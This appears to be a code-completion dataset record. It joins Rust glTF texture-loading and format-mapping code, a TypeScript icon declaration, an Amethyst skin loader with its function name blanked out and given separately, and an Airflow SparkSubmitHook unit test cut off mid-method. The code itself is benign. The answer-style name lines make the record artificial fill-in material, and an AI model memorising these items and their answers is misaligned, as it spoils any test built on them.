/// Loads a single image from a [`gltf::Image`], with caching. /// /// Uses the given ImageMap as a cache. /// /// All binary data buffers must be provided. You can get the image from a /// texture by calling [`gltf::Texture::source`]. /// /// io_func determines how URIs are resolved into their underlying data. pub async fn load_image_cached<F, Fut, E>( renderer: &Renderer, images: &mut ImageMap, image: gltf::Image<'_>, srgb: bool, buffers: &[Vec<u8>], io_func: &mut F, ) -> Result<Labeled<Texture>, GltfLoadError<E>> where F: FnMut(SsoString) -> Fut, Fut: Future<Output = Result<Vec<u8>, E>>, E: std::error::Error + 'static, { let key = ImageKey { index: image.index(), srgb, }; let entry = match images.entry(key) { Entry::Occupied(handle) => return Ok(handle.get().clone()), Entry::Vacant(v) => v, }; let handle = load_image(renderer, image, srgb, buffers, io_func).await?; entry.insert(handle.clone()); Ok(handle) } /// Loads a single image from a [`gltf::Image`]. /// /// All binary data buffers must be provided. Call this with /// [`gltf::Document::materials`] as the materials argument. /// /// io_func determines how URIs are resolved into their underlying data. pub async fn load_image<F, Fut, E>( renderer: &Renderer, image: gltf::Image<'_>, srgb: bool, buffers: &[Vec<u8>], io_func: &mut F, ) -> Result<Labeled<Texture>, GltfLoadError<E>> where F: FnMut(SsoString) -> Fut, Fut: Future<Output = Result<Vec<u8>, E>>, E: std::error::Error + 'static, { // profiling::scope!("load image", image.name().unwrap_or_default()); let (data, uri) = match image.source() { gltf::image::Source::Uri { uri, .. } => { let data = io_func(SsoString::from(uri)) .await .map_err(|e| GltfLoadError::TextureIo(SsoString::from(uri), e))?; (Cow::Owned(data), SsoString::from(uri)) } gltf::image::Source::View { view, .. } => { let start = view.offset(); let end = start + view.length(); ( Cow::Borrowed(&buffers[view.buffer().index()][start..end]), SsoString::from("<embedded>"), ) } }; let mut uri = Some(uri); let mut texture = None; #[cfg(feature = "ktx2")] if let Ok(reader) = ktx2::Reader::new(&data) { profiling::scope!("parsing ktx2"); let header = reader.header(); let src_format = header.format.unwrap(); let format = util::map_ktx2_format(src_format, srgb) .ok_or_else(|| GltfLoadError::TextureBadKxt2Format(uri.take().unwrap(), src_format))?; if header.level_count == 0 { return Err(GltfLoadError::TextureZeroLevels(uri.take().unwrap())); } if header.layer_count >= 2 { return Err(GltfLoadError::TextureTooManyLayers(uri.take().unwrap())); } let describe = format.describe(); let guaranteed_format = describe.guaranteed_format_features; let generate = header.level_count == 1 && guaranteed_format.filterable && guaranteed_format.allowed_usages.contains( rend3::types::TextureUsages::TEXTURE_BINDING | rend3::types::TextureUsages::RENDER_ATTACHMENT, ); let size: usize = reader.levels().map(|s| s.len()).sum(); let mut data = Vec::with_capacity(size); for level in reader.levels() { data.extend_from_slice(level); } texture = Some(types::Texture { label: image.name().map(str::to_owned), format, size: UVec2::new(header.pixel_width, header.pixel_height), data, mip_count: if generate { types::MipmapCount::Maximum } else { types::MipmapCount::Specific(std::num::NonZeroU32::new(header.level_count).unwrap()) }, mip_source: if generate { types::MipmapSource::Generated } else { types::MipmapSource::Uploaded }, }) } #[cfg(feature = "ddsfile")] if texture.is_none() { if let Ok(dds) = ddsfile::Dds::read(&mut std::io::Cursor::new(&data)) { profiling::scope!("parsing dds"); let format = dds .get_dxgi_format() .map(|f| { util::map_dxgi_format(f, srgb) .ok_or_else(|| GltfLoadError::TextureBadDxgiFormat(uri.take().unwrap(), f)) }) .or_else(|| { dds.get_d3d_format().map(|f| { util::map_d3d_format(f, srgb) .ok_or_else(|| GltfLoadError::TextureBadD3DFormat(uri.take().unwrap(), f)) }) }) .unwrap()?; let levels = dds.get_num_mipmap_levels(); if levels == 0 { return Err(GltfLoadError::TextureZeroLevels(uri.take().unwrap())); } let guaranteed_format = format.describe().guaranteed_format_features; let generate = dds.get_num_mipmap_levels() == 1 && guaranteed_format.filterable && guaranteed_format.allowed_usages.contains( rend3::types::TextureUsages::TEXTURE_BINDING | rend3::types::TextureUsages::RENDER_ATTACHMENT, ); let data = dds .get_data(0) .map_err(|_| GltfLoadError::TextureTooManyLayers(uri.take().unwrap()))?; texture = Some(types::Texture { label: image.name().map(str::to_owned), format, size: UVec2::new(dds.get_width(), dds.get_height()), data: data.to_vec(), mip_count: if generate { types::MipmapCount::Maximum } else { types::MipmapCount::Specific(std::num::NonZeroU32::new(dds.get_num_mipmap_levels()).unwrap()) }, mip_source: if generate { types::MipmapSource::Generated } else { types::MipmapSource::Uploaded }, }) } } if texture.is_none() { profiling::scope!("decoding image"); let parsed = image::load_from_memory(&data).map_err(|e| GltfLoadError::TextureDecode(uri.take().unwrap(), e))?; let size = UVec2::new(parsed.width(), parsed.height()); let (data, format) = util::convert_dynamic_image(parsed, srgb); texture = Some(types::Texture { label: image.name().map(str::to_owned), format, size, data, mip_count: types::MipmapCount::Maximum, mip_source: types::MipmapSource::Generated, }) }; let texture = texture.unwrap(); let format = texture.format; let handle = renderer.add_texture_2d(texture); Ok(Labeled::new(Texture { handle, format }, image.name())) } /// Implementation utilities. pub mod util { use std::future::Future; use image::{buffer::ConvertBuffer, Bgra, ImageBuffer, Luma, Rgba}; use rend3::types; use crate::{Labeled, Texture}; /// Turns an `Option<Texture>` into `Option<types::TextureHandle>` pub fn extract_handle(texture: Option<Texture>) -> Option<types::TextureHandle> { texture.map(|t| t.handle) } /// Turns a `Option<Future<Output = Result<Labeled<T>, E>>>>` into a /// `Future<Output = Result<Option<T>, E>>` /// /// This is a very specific transformation that shows up a lot when using /// [`load_image_cached`](super::load_image_cached). pub async fn texture_option_resolve<F: Future, T, E>(fut: Option<F>) -> Result<Option<T>, E> where F: Future<Output = Result<Labeled<T>, E>>, { if let Some(f) = fut { match f.await { Ok(l) => Ok(Some(l.inner)), Err(e) => Err(e), } } else { Ok(None) } } pub fn convert_dynamic_image(image: image::DynamicImage, srgb: bool) -> (Vec<u8>, rend3::types::TextureFormat) { use rend3::types::TextureFormat as r3F; // profiling::scope!("convert dynamic image"); match image { image::DynamicImage::ImageLuma8(i) => (i.into_raw(), r3F::R8Unorm), image::DynamicImage::ImageLumaA8(i) => ( ConvertBuffer::<ImageBuffer<Luma<u8>, Vec<u8>>>::convert(&i).into_raw(), r3F::R8Unorm, ), image::DynamicImage::ImageRgb8(i) => ( ConvertBuffer::<ImageBuffer<Rgba<u8>, Vec<u8>>>::convert(&i).into_raw(), if srgb { r3F::Rgba8UnormSrgb } else { r3F::Rgba8Unorm }, ), image::DynamicImage::ImageRgba8(i) => { (i.into_raw(), if srgb { r3F::Rgba8UnormSrgb } else { r3F::Rgba8Unorm }) } image::DynamicImage::ImageBgr8(i) => ( ConvertBuffer::<ImageBuffer<Bgra<u8>, Vec<u8>>>::convert(&i).into_raw(), if srgb { r3F::Bgra8UnormSrgb } else { r3F::Bgra8Unorm }, ), image::DynamicImage::ImageBgra8(i) => { (i.into_raw(), if srgb { r3F::Bgra8UnormSrgb } else { r3F::Bgra8Unorm }) } i => ( i.into_rgba8().into_raw(), if srgb { r3F::Rgba8UnormSrgb } else { r3F::Rgba8Unorm }, ), } } /// Maps a ktx2 format into the rend3's TextureFormat #[cfg(feature = "ktx2")] pub fn map_ktx2_format(format: ktx2::Format, srgb: bool) -> Option<rend3::types::TextureFormat> { use ktx2::Format as k2F; use rend3::types::TextureFormat as r3F; Some(match format { k2F::R4G4_UNORM_PACK8 | k2F::R4G4B4A4_UNORM_PACK16 | k2F::B4G4R4A4_UNORM_PACK16 | k2F::R5G6B5_UNORM_PACK16 | k2F::B5G6R5_UNORM_PACK16 | k2F::R5G5B5A1_UNORM_PACK16 | k2F::B5G5R5A1_UNORM_PACK16 | k2F::A1R5G5B5_UNORM_PACK16 => return None, k2F::R8_UNORM | k2F::R8_SRGB => { if srgb { return None; } else { r3F::R8Unorm } } k2F::R8_SNORM => r3F::R8Snorm, k2F::R8_UINT => r3F::R8Uint, k2F::R8_SINT => r3F::R8Sint, k2F::R8G8_UNORM | k2F::R8G8_SRGB => { if srgb { return None; } else { r3F::Rg8Unorm } } k2F::R8G8_SNORM => r3F::Rg8Snorm, k2F::R8G8_UINT => r3F::Rg8Uint, k2F::R8G8_SINT => r3F::Rg8Sint, k2F::R8G8B8_UNORM | k2F::R8G8B8_SNORM | k2F::R8G8B8_UINT | k2F::R8G8B8_SINT | k2F::R8G8B8_SRGB | k2F::B8G8R8_UNORM | k2F::B8G8R8_SNORM | k2F::B8G8R8_UINT | k2F::B8G8R8_SINT | k2F::B8G8R8_SRGB => return None, k2F::R8G8B8A8_UNORM | k2F::R8G8B8A8_SRGB => { if srgb { r3F::Rgba8UnormSrgb } else { r3F::Rgba8Unorm } } k2F::R8G8B8A8_SNORM => r3F::Rgba8Snorm, k2F::R8G8B8A8_UINT => r3F::Rgba8Uint, k2F::R8G8B8A8_SINT => r3F::Rgba8Sint, k2F::B8G8R8A8_UNORM | k2F::B8G8R8A8_SRGB => { if srgb { r3F::Bgra8UnormSrgb } else { r3F::Bgra8Unorm } } k2F::B8G8R8A8_SNORM | k2F::B8G8R8A8_UINT | k2F::B8G8R8A8_SINT => return None, k2F::A2B10G10R10_UNORM_PACK32 => r3F::Rgb10a2Unorm, k2F::A2R10G10B10_UNORM_PACK32 | k2F::A2R10G10B10_SNORM_PACK32 | k2F::A2R10G10B10_UINT_PACK32 | k2F::A2R10G10B10_SINT_PACK32 | k2F::A2B10G10R10_SNORM_PACK32 | k2F::A2B10G10R10_UINT_PACK32 | k2F::A2B10G10R10_SINT_PACK32 => return None, k2F::R16_UNORM | k2F::R16_SNORM => return None, k2F::R16_UINT => r3F::R16Uint, k2F::R16_SINT => r3F::R16Sint, k2F::R16_SFLOAT => r3F::R16Float, k2F::R16G16_UNORM | k2F::R16G16_SNORM => return None, k2F::R16G16_UINT => r3F::Rg16Uint, k2F::R16G16_SINT => r3F::Rg16Sint, k2F::R16G16_SFLOAT => r3F::Rg16Float, k2F::R16G16B16_UNORM | k2F::R16G16B16_SNORM | k2F::R16G16B16_UINT | k2F::R16G16B16_SINT | k2F::R16G16B16_SFLOAT => return None, k2F::R16G16B16A16_UNORM => r3F::Rgba16Unorm, k2F::R16G16B16A16_SNORM => r3F::Rgba16Snorm, k2F::R16G16B16A16_UINT => r3F::Rgba16Uint, k2F::R16G16B16A16_SINT => r3F::Rgba16Sint, k2F::R16G16B16A16_SFLOAT => r3F::Rgba16Float, k2F::R32_UINT => r3F::R32Uint, k2F::R32_SINT => r3F::R32Sint, k2F::R32_SFLOAT => r3F::R32Float, k2F::R32G32_UINT => r3F::Rg32Uint, k2F::R32G32_SINT => r3F::Rg32Sint, k2F::R32G32_SFLOAT => r3F::Rg32Float, k2F::R32G32B32_UINT | k2F::R32G32B32_SINT | k2F::R32G32B32_SFLOAT => return None, k2F::R32G32B32A32_UINT => r3F::Rgba32Uint, k2F::R32G32B32A32_SINT => r3F::Rgba32Sint, k2F::R32G32B32A32_SFLOAT => r3F::Rgba32Float, k2F::R64_UINT | k2F::R64_SINT | k2F::R64_SFLOAT | k2F::R64G64_UINT | k2F::R64G64_SINT | k2F::R64G64_SFLOAT | k2F::R64G64B64_UINT | k2F::R64G64B64_SINT | k2F::R64G64B64_SFLOAT | k2F::R64G64B64A64_UINT | k2F::R64G64B64A64_SINT | k2F::R64G64B64A64_SFLOAT => return None, k2F::B10G11R11_UFLOAT_PACK32 => r3F::Rg11b10Float, k2F::E5B9G9R9_UFLOAT_PACK32 => r3F::Rgb9e5Ufloat, k2F::D16_UNORM => return None, k2F::X8_D24_UNORM_PACK32 => r3F::Depth24Plus, k2F::D32_SFLOAT => r3F::Depth32Float, k2F::S8_UINT | k2F::D16_UNORM_S8_UINT => return None, k2F::D24_UNORM_S8_UINT => r3F::Depth24PlusStencil8, k2F::D32_SFLOAT_S8_UINT => return None, k2F::BC1_RGB_UNORM_BLOCK | k2F::BC1_RGB_SRGB_BLOCK | k2F::BC1_RGBA_UNORM_BLOCK | k2F::BC1_RGBA_SRGB_BLOCK => { if srgb { r3F::Bc1RgbaUnormSrgb } else { r3F::Bc1RgbaUnorm } } k2F::BC2_UNORM_BLOCK | k2F::BC2_SRGB_BLOCK => { if srgb { r3F::Bc2RgbaUnormSrgb } else { r3F::Bc2RgbaUnorm } } k2F::BC3_UNORM_BLOCK | k2F::BC3_SRGB_BLOCK => { if srgb { r3F::Bc3RgbaUnormSrgb } else { r3F::Bc3RgbaUnorm } } k2F::BC4_UNORM_BLOCK => r3F::Bc4RUnorm, k2F::BC4_SNORM_BLOCK => r3F::Bc4RSnorm, k2F::BC5_UNORM_BLOCK => r3F::Bc5RgUnorm, k2F::BC5_SNORM_BLOCK => r3F::Bc5RgSnorm, k2F::BC6H_UFLOAT_BLOCK => r3F::Bc6hRgbUfloat, k2F::BC6H_SFLOAT_BLOCK => r3F::Bc6hRgbSfloat, k2F::BC7_UNORM_BLOCK | k2F::BC7_SRGB_BLOCK => { if srgb { r3F::Bc7RgbaUnormSrgb } else { r3F::Bc7RgbaUnorm } } k2F::ETC2_R8G8B8_UNORM_BLOCK | k2F::ETC2_R8G8B8_SRGB_BLOCK => { if srgb { r3F::Etc2Rgb8UnormSrgb } else { r3F::Etc2Rgb8Unorm } } k2F::ETC2_R8G8B8A1_UNORM_BLOCK | k2F::ETC2_R8G8B8A1_SRGB_BLOCK => { if srgb { r3F::Etc2Rgb8A1UnormSrgb } else { r3F::Etc2Rgb8A1Unorm } } k2F::ETC2_R8G8B8A8_UNORM_BLOCK | k2F::ETC2_R8G8B8A8_SRGB_BLOCK => return None, k2F::EAC_R11_UNORM_BLOCK => r3F::EacR11Unorm, k2F::EAC_R11_SNORM_BLOCK => r3F::EacR11Snorm, k2F::EAC_R11G11_UNORM_BLOCK => r3F::EacRg11Unorm, k2F::EAC_R11G11_SNORM_BLOCK => r3F::EacRg11Snorm, k2F::ASTC_4x4_UNORM_BLOCK | k2F::ASTC_4x4_SRGB_BLOCK => { if srgb { r3F::Astc4x4RgbaUnormSrgb } else { r3F::Astc4x4RgbaUnorm } } k2F::ASTC_5x4_UNORM_BLOCK | k2F::ASTC_5x4_SRGB_BLOCK => { if srgb { r3F::Astc5x4RgbaUnormSrgb } else { r3F::Astc5x4RgbaUnorm } } k2F::ASTC_5x5_UNORM_BLOCK | k2F::ASTC_5x5_SRGB_BLOCK => { if srgb { r3F::Astc5x5RgbaUnormSrgb } else { r3F::Astc5x5RgbaUnorm } } k2F::ASTC_6x5_UNORM_BLOCK | k2F::ASTC_6x5_SRGB_BLOCK => { if srgb { r3F::Astc6x5RgbaUnormSrgb } else { r3F::Astc6x5RgbaUnorm } } k2F::ASTC_6x6_UNORM_BLOCK | k2F::ASTC_6x6_SRGB_BLOCK => { if srgb { r3F::Astc6x6RgbaUnormSrgb } else { r3F::Astc6x6RgbaUnorm } } k2F::ASTC_8x5_UNORM_BLOCK | k2F::ASTC_8x5_SRGB_BLOCK => { if srgb { r3F::Astc8x5RgbaUnormSrgb } else { r3F::Astc8x5RgbaUnorm } } k2F::ASTC_8x6_UNORM_BLOCK | k2F::ASTC_8x6_SRGB_BLOCK => { if srgb { r3F::Astc8x6RgbaUnormSrgb } else { r3F::Astc8x6RgbaUnorm } } k2F::ASTC_8x8_UNORM_BLOCK | k2F::ASTC_8x8_SRGB_BLOCK => { if srgb { r3F::Astc8x8RgbaUnormSrgb } else { r3F::Astc8x8RgbaUnorm } } k2F::ASTC_10x5_UNORM_BLOCK | k2F::ASTC_10x5_SRGB_BLOCK => { if srgb { r3F::Astc10x5RgbaUnormSrgb } else { r3F::Astc10x5RgbaUnorm } } k2F::ASTC_10x6_UNORM_BLOCK | k2F::ASTC_10x6_SRGB_BLOCK => { if srgb { r3F::Astc10x6RgbaUnormSrgb } else { r3F::Astc10x6RgbaUnorm } } k2F::ASTC_10x8_UNORM_BLOCK | k2F::ASTC_10x8_SRGB_BLOCK => { if srgb { r3F::Astc10x8RgbaUnormSrgb } else { r3F::Astc10x8RgbaUnorm } } k2F::ASTC_10x10_UNORM_BLOCK | k2F::ASTC_10x10_SRGB_BLOCK => { if srgb { r3F::Astc10x10RgbaUnormSrgb } else { r3F::Astc10x10RgbaUnorm } } k2F::ASTC_12x10_UNORM_BLOCK | k2F::ASTC_12x10_SRGB_BLOCK => { if srgb { r3F::Astc12x10RgbaUnormSrgb } else { r3F::Astc12x10RgbaUnorm } } k2F::ASTC_12x12_UNORM_BLOCK | k2F::ASTC_12x12_SRGB_BLOCK => { if srgb { r3F::Astc12x12RgbaUnormSrgb } else { r3F::Astc12x12RgbaUnorm } } _ => return None, }) } /// Maps a dds file d3dformat into the rend3's TextureFormat #[cfg(feature = "ddsfile")] pub fn map_d3d_format(format: ddsfile::D3DFormat, srgb: bool) -> Option<rend3::types::TextureFormat> { use ddsfile::D3DFormat as d3F; use rend3::types::TextureFormat as r3F; Some(match format { d3F::A8B8G8R8 => { if srgb { r3F::Rgba8UnormSrgb } else { r3F::Rgba8Unorm } } d3F::G16R16 => r3F::Rg16Uint, d3F::A2B10G10R10 => return None, d3F::A1R5G5B5 => return None, d3F::R5G6B5 => return None, d3F::A8 => r3F::R8Unorm, d3F::A8R8G8B8 => { if srgb { r3F::Bgra8UnormSrgb } else { r3F::Bgra8Unorm } } d3F::X8R8G8B8 | d3F::X8B8G8R8 | d3F::A2R10G10B10 | d3F::R8G8B8 | d3F::X1R5G5B5 | d3F::A4R4G4B4 | d3F::X4R4G4B4 | d3F::A8R3G3B2 => return None, d3F::A8L8 => r3F::Rg8Uint, d3F::L16 => r3F::R16Uint, d3F::L8 => r3F::R8Uint, d3F::A4L4 => return None, d3F::DXT1 => { if srgb { r3F::Bc1RgbaUnormSrgb } else { r3F::Bc1RgbaUnorm } } d3F::DXT2 | d3F::DXT3 => { if srgb { r3F::Bc2RgbaUnormSrgb } else { r3F::Bc2RgbaUnorm } } d3F::DXT4 | d3F::DXT5 => { if srgb { r3F::Bc3RgbaUnormSrgb } else { r3F::Bc3RgbaUnorm } } d3F::R8G8_B8G8 => return None, d3F::G8R8_G8B8 => return None, d3F::A16B16G16R16 => r3F::Rgba16Uint, d3F::Q16W16V16U16 => r3F::Rgba16Sint, d3F::R16F => r3F::R16Float, d3F::G16R16F => r3F::Rg16Float, d3F::A16B16G16R16F => r3F::Rgba16Float, d3F::R32F => r3F::R32Float, d3F::G32R32F => r3F::Rg32Float, d3F::A32B32G32R32F => r3F::Rgba32Float, d3F::UYVY => return None, d3F::YUY2 => return None, d3F::CXV8U8 => return None, }) } #[cfg(feature = "ddsfile")] pub fn map_dxgi_format(format: ddsfile::DxgiFormat, srgb: bool) -> Option<rend3::types::TextureFormat> { use ddsfile::DxgiFormat as d3F; use rend3::types::TextureFormat as r3F; Some(match format { d3F::Unknown => return None, d3F::R32G32B32A32_Typeless | d3F::R32G32B32A32_Float => r3F::Rgba32Float, d3F::R32G32B32A32_UInt => r3F::Rgba32Uint, d3F::R32G32B32A32_SInt => r3F::Rgba32Sint, d3F::R32G32B32_Typeless | d3F::R32G32B32_Float | d3F::R32G32B32_UInt | d3F::R32G32B32_SInt => return None, d3F::R16G16B16A16_Typeless | d3F::R16G16B16A16_Float => r3F::Rgba16Float, d3F::R16G16B16A16_UInt => r3F::Rgba16Uint, d3F::R16G16B16A16_UNorm | d3F::R16G16B16A16_SNorm => return None, d3F::R16G16B16A16_SInt => r3F::Rgba16Sint, d3F::R32G32_Typeless | d3F::R32G32_Float => r3F::Rg32Float, d3F::R32G32_UInt => r3F::Rg32Uint, d3F::R32G32_SInt => r3F::Rg32Sint, d3F::R32G8X24_Typeless | d3F::D32_Float_S8X24_UInt | d3F::R32_Float_X8X24_Typeless | d3F::X32_Typeless_G8X24_UInt | d3F::R10G10B10A2_Typeless | d3F::R10G10B10A2_UNorm | d3F::R10G10B10A2_UInt => return None, d3F::R11G11B10_Float => r3F::Rg11b10Float, d3F::R8G8B8A8_Typeless | d3F::R8G8B8A8_UNorm | d3F::R8G8B8A8_UNorm_sRGB => { if srgb { r3F::Rgba8UnormSrgb } else { r3F::Rgba8Unorm } } d3F::R8G8B8A8_UInt => r3F::Rgba8Uint, d3F::R8G8B8A8_SNorm => r3F::Rgba8Snorm, d3F::R8G8B8A8_SInt => r3F::Rgba8Sint, d3F::R16G16_Typeless | d3F::R16G16_Float => r3F::Rg16Float, d3F::R16G16_UInt => r3F::Rg16Uint, d3F::R16G16_SInt => r3F::Rg16Sint, d3F::R16G16_UNorm | d3F::R16G16_SNorm => return None, d3F::R32_Typeless | d3F::R32_Float => r3F::R32Float, d3F::D32_Float => r3F::Depth32Float, d3F::R32_UInt => r3F::R32Uint, d3F::R32_SInt => r3F::R32Sint, d3F::R24G8_Typeless | d3F::D24_UNorm_S8_UInt => r3F::Depth24PlusStencil8, d3F::R24_UNorm_X8_Typeless => r3F::Depth24Plus, d3F::X24_Typeless_G8_UInt => return None, d3F::R8G8_Typeless | d3F::R8G8_UNorm => r3F::Rg8Unorm, d3F::R8G8_UInt => r3F::Rg8Uint, d3F::R8G8_SNorm => r3F::Rg8Snorm, d3F::R8G8_SInt => r3F::Rg8Sint, d3F::R16_Typeless | d3F::R16_Float => r3F::R16Float, d3F::D16_UNorm | d3F::R16_SNorm | d3F::R16_UNorm => return None, d3F::R16_UInt => r3F::R16Uint, d3F::R16_SInt => r3F::R16Sint, d3F::R8_Typeless | d3F::R8_UNorm => r3F::R8Unorm, d3F::R8_UInt => r3F::R8Uint, d3F::R8_SNorm => r3F::R8Snorm, d3F::R8_SInt => r3F::R8Sint, d3F::A8_UNorm => return None, d3F::R1_UNorm => return None, d3F::R9G9B9E5_SharedExp => r3F::Rgb9e5Ufloat, d3F::R8G8_B8G8_UNorm => return None, d3F::G8R8_G8B8_UNorm => return None, d3F::BC1_Typeless | d3F::BC1_UNorm | d3F::BC1_UNorm_sRGB => { if srgb { r3F::Bc1RgbaUnormSrgb } else { r3F::Bc1RgbaUnorm } } d3F::BC2_Typeless | d3F::BC2_UNorm | d3F::BC2_UNorm_sRGB => { if srgb { r3F::Bc2RgbaUnormSrgb } else { r3F::Bc2RgbaUnorm } } d3F::BC3_Typeless | d3F::BC3_UNorm | d3F::BC3_UNorm_sRGB => { if srgb { r3F::Bc3RgbaUnormSrgb } else { r3F::Bc3RgbaUnorm } } d3F::BC4_Typeless | d3F::BC4_UNorm => r3F::Bc4RUnorm, d3F::BC4_SNorm => r3F::Bc4RSnorm, d3F::BC5_Typeless | d3F::BC5_UNorm => r3F::Bc5RgUnorm, d3F::BC5_SNorm => r3F::Bc5RgSnorm, d3F::B5G6R5_UNorm | d3F::B5G5R5A1_UNorm => return None, d3F::B8G8R8A8_UNorm | d3F::B8G8R8A8_Typeless | d3F::B8G8R8A8_UNorm_sRGB => { if srgb { r3F::Bgra8UnormSrgb } else { r3F::Bgra8Unorm } } d3F::B8G8R8X8_UNorm | d3F::R10G10B10_XR_Bias_A2_UNorm | d3F::B8G8R8X8_Typeless | d3F::B8G8R8X8_UNorm_sRGB => return None, d3F::BC6H_Typeless | d3F::BC6H_UF16 => r3F::Bc6hRgbUfloat, d3F::BC6H_SF16 => r3F::Bc6hRgbSfloat, d3F::BC7_Typeless | d3F::BC7_UNorm | d3F::BC7_UNorm_sRGB => { if srgb { r3F::Bc7RgbaUnormSrgb } else { r3F::Bc7RgbaUnorm } } d3F::AYUV | d3F::Y410 | d3F::Y416 | d3F::NV12 | d3F::P010 | d3F::P016 | d3F::Format_420_Opaque | d3F::YUY2 | d3F::Y210 | d3F::Y216 | d3F::NV11 | d3F::AI44 | d3F::IA44 | d3F::P8 | d3F::A8P8 | d3F::B4G4R4A4_UNorm | d3F::P208 | d3F::V208 | d3F::V408 | d3F::Force_UInt => return None, }) } }
compute_animation_duration
ArrowElbowRight.d.ts
import React from "react"; import { IconProps } from "../lib"; declare const ArrowElbowRight: React.ForwardRefExoticComponent<IconProps & React.RefAttributes<SVGSVGElement>>;
export default ArrowElbowRight;
skin.rs
use std::collections::HashMap; use amethyst_animation::{Joint, Skin}; use amethyst_core::{ ecs::{Entity, World}, math::{convert, Matrix4}, }; use amethyst_rendy::skinning::JointTransforms; use gltf::buffer::Data; use crate::importer::SkinInfo; pub fn
( skin: &gltf::Skin<'_>, buffers: &[Data], entity: Entity, skin_infos: &SkinInfo, node_map: &HashMap<usize, Entity>, world: &mut World, ) { let joint_entities = skin .joints() .map(|j| { node_map.get(&j.index()).cloned().expect( "Unreachable: `node_map` is initialized with the indexes from the `Gltf` object", ) }) .collect::<Vec<_>>(); let reader = skin.reader(|buffer| { Some( buffers .get(buffer.index()) .expect("Error while reading skin buffer") .0 .as_slice(), ) }); let inverse_bind_matrices = reader .read_inverse_bind_matrices() .map(|matrices| { matrices .map(Matrix4::from) .map(convert::<_, Matrix4<f32>>) .collect() }) .unwrap_or_else(|| vec![Matrix4::identity(); joint_entities.len()]); let mut aggregator = HashMap::<Entity, Vec<Entity>>::new(); for (_bind_index, joint_entity) in joint_entities.iter().enumerate() { aggregator .entry(*joint_entity) .or_insert_with(Vec::new) .push(entity); } for (entity, skins) in aggregator.iter() { let joint = Joint { skins: skins.clone(), }; world .entry(*entity) .expect("This can't be reached because the entity comes from this world") .add_component(joint); } let joint_transforms = JointTransforms { skin: entity, matrices: vec![Matrix4::identity(); joint_entities.len()], }; for mesh_entity in &skin_infos.mesh_indices { world .entry(*mesh_entity) .expect("This can't be reached because the entity comes from this world") .add_component(joint_transforms.clone()); } let len = joint_entities.len(); let skin = Skin { joints: joint_entities, meshes: skin_infos.mesh_indices.clone(), bind_shape_matrix: Matrix4::identity(), inverse_bind_matrices, joint_matrices: Vec::with_capacity(len), }; world .entry(entity) .expect("This can't be reached because the entity comes from this world") .add_component(skin); }
load_skin
test_spark_submit_hook.py
# -*- coding: utf-8 -*- # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import io import unittest from unittest.mock import call, patch from airflow import AirflowException from airflow.contrib.hooks.spark_submit_hook import SparkSubmitHook from airflow.models import Connection from airflow.utils import db class TestSparkSubmitHook(unittest.TestCase): _spark_job_file = 'test_application.py' _config = { 'conf': { 'parquet.compression': 'SNAPPY' }, 'conn_id': 'default_spark', 'files': 'hive-site.xml', 'py_files': 'sample_library.py', 'archives': 'sample_archive.zip#SAMPLE', 'jars': 'parquet.jar', 'packages': 'com.databricks:spark-avro_2.11:3.2.0', 'exclude_packages': 'org.bad.dependency:1.0.0', 'repositories': 'http://myrepo.org', 'total_executor_cores': 4, 'executor_cores': 4, 'executor_memory': '22g', 'keytab': 'privileged_user.keytab', 'principal': 'user/[email protected]', 'proxy_user': 'sample_user', 'name': 'spark-job', 'num_executors': 10, 'verbose': True, 'driver_memory': '3g', 'java_class': 'com.foo.bar.AppMain', 'application_args': [ '-f', 'foo', '--bar', 'bar', '--with-spaces', 'args should keep embdedded spaces', 'baz' ] } @staticmethod def cmd_args_to_dict(list_cmd): return_dict = {} for arg in list_cmd: if arg.startswith("--"): pos = list_cmd.index(arg) return_dict[arg] = list_cmd[pos + 1] return return_dict def setUp(self): db.merge_conn( Connection( conn_id='spark_yarn_cluster', conn_type='spark', host='yarn://yarn-master', extra='{"queue": "root.etl", "deploy-mode": "cluster"}') ) db.merge_conn( Connection( conn_id='spark_k8s_cluster', conn_type='spark', host='k8s://https://k8s-master', extra='{"spark-home": "/opt/spark", ' + '"deploy-mode": "cluster", ' + '"namespace": "mynamespace"}') ) db.merge_conn( Connection( conn_id='spark_default_mesos', conn_type='spark', host='mesos://host', port=5050) ) db.merge_conn( Connection( conn_id='spark_home_set', conn_type='spark', host='yarn://yarn-master', extra='{"spark-home": "/opt/myspark"}') ) db.merge_conn( Connection( conn_id='spark_home_not_set', conn_type='spark', host='yarn://yarn-master') ) db.merge_conn( Connection( conn_id='spark_binary_set', conn_type='spark', host='yarn', extra='{"spark-binary": "custom-spark-submit"}') ) db.merge_conn( Connection( conn_id='spark_binary_and_home_set', conn_type='spark', host='yarn', extra='{"spark-home": "/path/to/spark_home", ' + '"spark-binary": "custom-spark-submit"}') ) db.merge_conn( Connection( conn_id='spark_standalone_cluster', conn_type='spark', host='spark://spark-standalone-master:6066', extra='{"spark-home": "/path/to/spark_home", "deploy-mode": "cluster"}') ) db.merge_conn( Connection( conn_id='spark_standalone_cluster_client_mode', conn_type='spark', host='spark://spark-standalone-master:6066', extra='{"spark-home": "/path/to/spark_home", "deploy-mode": "client"}') ) def test_build_spark_submit_command(self): # Given hook = SparkSubmitHook(**self._config) # When cmd = hook._build_spark_submit_command(self._spark_job_file) # Then expected_build_cmd = [ 'spark-submit', '--master', 'yarn', '--conf', 'parquet.compression=SNAPPY', '--files', 'hive-site.xml', '--py-files', 'sample_library.py', '--archives', 'sample_archive.zip#SAMPLE', '--jars', 'parquet.jar', '--packages', 'com.databricks:spark-avro_2.11:3.2.0', '--exclude-packages', 'org.bad.dependency:1.0.0', '--repositories', 'http://myrepo.org', '--num-executors', '10', '--total-executor-cores', '4', '--executor-cores', '4', '--executor-memory', '22g', '--driver-memory', '3g', '--keytab', 'privileged_user.keytab', '--principal', 'user/[email protected]', '--proxy-user', 'sample_user', '--name', 'spark-job', '--class', 'com.foo.bar.AppMain', '--verbose', 'test_application.py', '-f', 'foo', '--bar', 'bar', '--with-spaces', 'args should keep embdedded spaces', 'baz' ] self.assertEqual(expected_build_cmd, cmd) @patch('airflow.contrib.hooks.spark_submit_hook.subprocess.Popen') def test_spark_process_runcmd(self, 